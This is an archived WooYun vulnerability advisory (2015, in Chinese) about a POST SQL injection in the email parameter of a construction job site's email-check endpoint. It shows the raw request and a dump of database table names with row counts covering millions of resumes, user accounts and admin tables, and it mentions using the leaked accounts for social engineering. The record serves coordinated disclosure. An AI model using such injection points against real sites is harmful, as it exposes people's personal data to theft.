当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148712

漏洞标题:中国建筑人才网SQL注入涉及400W+会员个人简历\大量人员个人信息

相关厂商:中国建筑人才网

漏洞作者: 路人甲

提交时间:2015-10-23 09:42

修复时间:2015-12-11 17:00

公开时间:2015-12-11 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

网站对输入参数过滤不当导致SQL注入,且权限很高

详细说明:

漏洞主站地址:http://**.**.**.**/
漏洞页面:http://**.**.**.**/personal/reg/my_regone.jsp
该处注入为POST注入 :

POST /personal/user_emailCheck.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://**.**.**.**/personal/reg/my_regone.jsp
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 27
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=aaaACnKxgT9xY7Q2-6kcv
email=4859593@**.**.**.**&flag=2


email参数存在注入

漏洞证明:

捕获.PNG


Database: buildjob
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.DenyIP                     | 10127606 |
| dbo.pub_History                | 4730420 |
| dbo.memberInviteResume         | 4683996 |
| dbo.memberRecevResume          | 4683996 |
| dbo.Position_VindicateLog      | 3590121 |
| dbo.My_ResumeViewedLog         | 2497338 |
| dbo.My_WorkExp                 | 1154051 |
| dbo.My_users                   | 1039178 |
| dbo.iResumeManage              | 1032708 |
| dbo.My_Resume                  | 1032704 |
| dbo.My_Education               | 949294  |
| dbo.resumeQuery                | 771811  |
| dbo.Email_SendLog              | 544938  |
| dbo.My_OutSendResumeLog        | 367081  |
| dbo.Mem_Position               | 245883  |
| dbo.dataAnalyse_VIEW           | 217998  |
| dbo.My_Training                | 176556  |
| dbo.Mem_History                | 147536  |
| dbo.My_Favouriate              | 100082  |
| dbo.Mem_account                | 80677   |
| dbo.Mem_Rights                 | 80660   |
| dbo.Mem_Info                   | 80649   |
| dbo.memberRight                | 80574   |
| dbo.memberRightAccount         | 80561   |
| dbo.My_Searcher                | 58771   |
| dbo.Mem_Resume_Classify        | 51341   |
| dbo.Position                   | 49902   |
| dbo.JOB_LOGIN_DATA             | 40015   |
| dbo.Mem_Address_Map            | 39524   |
| dbo.Q_ANSWER_ALL               | 39030   |
| dbo.My_Alijob                  | 34561   |
| dbo.LinkFluxLog                | 32375   |
| dbo.My_Letter                  | 27372   |
| dbo.My_Certificate             | 27338   |
| dbo.Company                    | 19072   |
| dbo.DisableIP                  | 16504   |
| dbo.LT_POST_INFO_ALL           | 12704   |
| dbo.Admin_LogoInfo             | 10775   |
| dbo.Q_ANSWER_ALL_new           | 10378   |
| dbo.Mem_Searcher               | 9147    |
| dbo.BrowseHistory              | 7734    |
| dbo.Weibo_User_Login           | 5972    |
| dbo.Mem_dept                   | 5964    |
| dbo.try_memid                  | 5719    |
| dbo.mem_pwd_info               | 5187    |
| dbo.My_WorkExp2                | 4356    |
| dbo.My_Resume_eng              | 4207    |
| dbo.memberRevertResume         | 3817    |
| dbo.My_Education_Eng           | 3051    |
| dbo.LT_MEMBER_INFO_ALL         | 3011    |
| dbo.Mem_SpeedReg               | 2972    |
| dbo.My_Education2              | 2387    |
| dbo.Zixun_Articles_Copy        | 2213    |
| dbo.Weibo_Token                | 2212    |
| dbo.My_Photo                   | 2051    |
| dbo.My_WorkExp_Eng             | 1994    |
| dbo.Sch_Account                | 1661    |
| dbo.weixin_oauth_user          | 1545    |
| dbo.ZH_PERSON_INFO_ALL         | 1410    |
| dbo.ForumUser                  | 1111    |
| dbo.SellOnSelfResume           | 1020    |
| dbo.Address                    | 961     |
| dbo.My_Training_Eng            | 864     |
| dbo.PASSWORD_RECOVERY          | 689     |
| dbo.DeletePositionLog          | 664     |
| dbo.Mem_ReplyModel             | 632     |
| dbo.Sch_Info                   | 444     |
| dbo.My_Order                   | 437     |
| dbo.Msg_20118                  | 419     |
| dbo.logoType                   | 346     |
| dbo.Q_QUESTION_ALL             | 302     |
| dbo.LT_APPROVED_ALL            | 290     |
| dbo.LT_USER_INFO_ALL           | 285     |
| dbo.Q_QUESTION_ALL_new         | 251     |
| dbo.Admin_HoldRight            | 206     |
| dbo.Mem_GetOutLog              | 184     |
| dbo.Msg_Templates              | 167     |
| dbo.forumAttachment            | 120     |
| dbo.industry                   | 108     |
| dbo.Resume_Order               | 102     |
| dbo.Msg_20099                  | 98      |
| dbo.Sch_Student                | 93      |
| dbo.AdminMenu                  | 92      |
| dbo.wuerba_Dic_JobSort         | 91      |
| dbo.My_Account                 | 84      |
| dbo.My_PayHistory              | 50      |
| dbo.JobCalling                 | 46      |
| dbo.Mns_Recommended_Posts_Msg  | 45      |
| dbo.Msg_Table                  | 39      |
| dbo.Admin_Keywords             | 38      |
| dbo.Admin_Technic_Menu         | 36      |
| dbo.ForumIntegral              | 35      |
| dbo.Pub_IdCenter               | 34      |
| dbo.PayPackage                 | 33      |
| dbo.ZH_COMPANY_INFO_ALL        | 33      |
| dbo.Tourjob_Rights             | 32      |
| dbo.Msg_20098                  | 29      |
| dbo.Msg_PayHistory             | 23      |
| dbo.PostsApply                 | 23      |
| dbo.ForumContent               | 22      |
| dbo.LT_CATEGORY_ALL            | 21      |
| dbo.Msg_201211                 | 21      |
| dbo.Msg_20153                  | 21      |
| dbo.Admin_Csc_Menu             | 19      |
| dbo.Msg_Account                | 18      |
| dbo.PosUpRed_Config            | 18      |
| dbo.buildjob_Rights            | 16      |
| dbo.Admin_Menu                 | 13      |
| dbo.Position_Order             | 13      |
| dbo.ForumPosts                 | 12      |
| dbo.Tourjob_Users              | 12      |
| dbo.admin_subcorpinfo          | 10      |
| dbo.resume_blacklist           | 10      |
| dbo.Zixun_Sort                 | 10      |
| dbo.Admin_Channel              | 9       |
| dbo.Admin_ID                   | 9       |
| dbo.buildjob_Users             | 9       |
| dbo.Msg_20105                  | 9       |
| dbo.Admin_Model                | 8       |
| dbo.Admin_Users                | 8       |
| dbo.Admin_Dredge_Menu          | 7       |
| dbo.Admin_Sell_Menu            | 6       |
| dbo.ForumAttention             | 6       |
| dbo.JOB_GROUP_CONFIG_ALL       | 6       |
| dbo.Msg_20104                  | 6       |
| dbo.Msg_20156                  | 6       |
| dbo.Admin_Content_Menu         | 5       |
| dbo.admin_corpinfo             | 5       |
| dbo.corp_account               | 5       |
| dbo.ForumCategory              | 5       |
| dbo.Msg_20119                  | 5       |
| dbo.Msg_History                | 5       |
| dbo.Admin_CopyAdmin_Menu       | 4       |
| dbo.JOB_GROUP_ROLE_ALL         | 4       |
| dbo.Msg_20143                  | 4       |
| dbo.Praise_Tread               | 4       |
| dbo.ForumCollection            | 3       |
| dbo.Msg_20094                  | 3       |
| dbo.Msg_20115                  | 3       |
| dbo.Msg_201212                 | 3       |
| dbo.Msg_20128                  | 3       |
| dbo.Msg_201411                 | 3       |
| dbo.SystemMap_Search           | 3       |
| dbo.JOB_GROUP_CONFIG_INDEX_ALL | 2       |
| dbo.JOB_GROUP_HISTORY_ALL      | 2       |
| dbo.Msg_20107                  | 2       |
| dbo.Msg_20129                  | 2       |
| dbo.SystemMap                  | 2       |
| dbo.Admin_dicVersion           | 1       |
| dbo.Admin_Spread_Menu          | 1       |
| dbo.Msg_20093                  | 1       |
| dbo.Msg_20095                  | 1       |
| dbo.Msg_20097                  | 1       |
| dbo.Msg_20109                  | 1       |
| dbo.Msg_201412                 | 1       |
| dbo.Msg_20147                  | 1       |
+--------------------------------+---------+


捕获1.PNG


捕获2.PNG


可见有460W+份个人简历信息泄露
其中包含有微信和微博等账号,可进行社公。
泄露数据库实例较多,涵盖大量信息:

捕获3.PNG


泄露人员信息:

档案数据.PNG


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-27 17:00

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无